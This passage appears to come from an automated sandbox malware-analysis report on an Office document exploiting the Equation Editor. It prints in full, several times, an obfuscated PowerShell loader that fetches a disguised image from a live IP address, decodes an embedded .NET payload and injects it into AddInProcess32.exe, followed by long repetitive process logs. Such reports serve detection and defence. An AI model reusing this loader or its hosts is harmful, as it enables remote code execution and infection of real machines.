System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_003847D2 push 8B038023h; iretd 6_2_003847D7
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: 6.2.powershell.exe.1f0000.0.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.1f0000.0.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.1f0000.0.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: 6.2.powershell.exe.62d7bb0.3.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.62d7bb0.3.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.62d7bb0.3.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A0539 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_034A0539
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
